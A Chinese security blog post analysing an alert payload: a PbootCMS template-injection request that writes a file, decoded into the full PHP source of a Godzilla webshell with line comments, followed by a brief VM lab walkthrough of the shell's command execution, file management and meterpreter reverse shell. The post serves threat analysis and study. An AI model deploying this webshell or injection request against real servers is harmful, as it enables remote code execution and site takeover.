今天在分析告警的时候,无意中碰到一个有意思的载荷,于是想追踪一下,结果发现是哥斯拉Godzilla,这是我第一次遇到哥斯拉,相信还会有第二次,第三次,看上去和冰蝎、蚁剑、菜刀一样,是一个有趣的webshell管理工具。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
GET /{pboot:if(("file_put_co"."ntents")("jump.php",("base6"."4_decode"),(...)))}{/pboot:if}/../../?p=cp/ HTTP/1.1将"file_put_co"."ntents" 连接起来是 file_put_contents
将"base6"."4_decode" 连接起来是 base64_decode
GET /{pboot:if(("file_put_contents")("jump.php",("base64_decode"),(...)))}{/pboot:if}/../../?p=cp/ HTTP/1.1file_put_contents 是 PHP 中用于向文件中写入内容的函数。
{pboot:if} 和 {/pboot:if} 看上去是一对标记 。
然后就是重头戏:... ,将其进行base64解码,得到一段PHP代码。
这段代码的核心在于对数据进行加密和解密,并通过特定条件执行有效载荷中的代码。
它使用了简单的异或运算作为加密手段,并且通过 eval() 函数执行了解密后的有效载荷。[1][2]
<?php@session_start(); // 尝试启动会话,@ 符号用于抑制错误输出@set_time_limit(0); // 设置脚本执行时间上限为无限制,@ 符号用于抑制错误输出@error_reporting(0); // 关闭错误报告,@ 符号用于抑制错误输出function encode($D, $K){ for($i=0; $i<strlen($D); $i++) { $c = $K[$i+1&15]; // 根据密钥 $K 处理加密 $D[$i] = $D[$i] ^ $c; // 通过异或运算对数据 $D 进行加密 } return $D; // 返回加密后的数据}$pass = 'day8'; // 设定密码$payloadName = 'payload'; // 设定有效载荷名称$key='83b70504e0d8742d'; // 设定密钥if (isset($_POST[$pass])){ // 如果收到了名为 $pass 的 POST 请求 $data = encode(base64_decode($_POST[$pass]), $key); // 对 POST 数据进行解码和加密处理 if (isset($_SESSION[$payloadName])){ // 如果会话中存在有效载荷 $payload = encode($_SESSION[$payloadName], $key); // 使用密钥对有效载荷进行解密 if (strpos($payload, "getBasicsInfo") === false){ // 如果有效载荷不包含指定字符串 $payload = encode($payload, $key); // 对有效载荷再次进行加密 } eval($payload); // 执行有效载荷中的代码 echo substr(md5($pass.$key), 0, 16); // 输出密码和密钥的部分 MD5 散列值 echo base64_encode(encode(@run($data), $key)); // 输出对特定函数运行结果的加密数据 echo substr(md5($pass.$key), 16); // 输出密码和密钥的部分 MD5 散列值的另一部分 } else { if (strpos($data, "getBasicsInfo") !== false){ // 如果接收到的数据包含指定字符串 $_SESSION[$payloadName] = encode($data, $key); // 将数据加密后存储到会话中作为有效载荷 } }}在网上寻找了一下,竟然找到了,是哥斯拉webshell代码,网上有对代码的详细解读。
于是,我想在虚拟机里面玩一玩,突然,这弹出的是什么?
(1)先生成一个webshell,并将其放在/var/www/html文件夹中,启动apache2
(2)在目标中添加,先进行测试,发现Success
(3)进入webshell,功能十分强大
(4)命令执行
(5)文件管理
(6)meterpreter 反弹shell上线
参考^哥斯拉代码解读 https://blog.csdn.net/zeros__/article/details/111521314^哥斯拉代码解读 https://www.cnblogs.com/encapsulation/p/15662851.html发布于 2023-12-03 20:14・IP 属地美国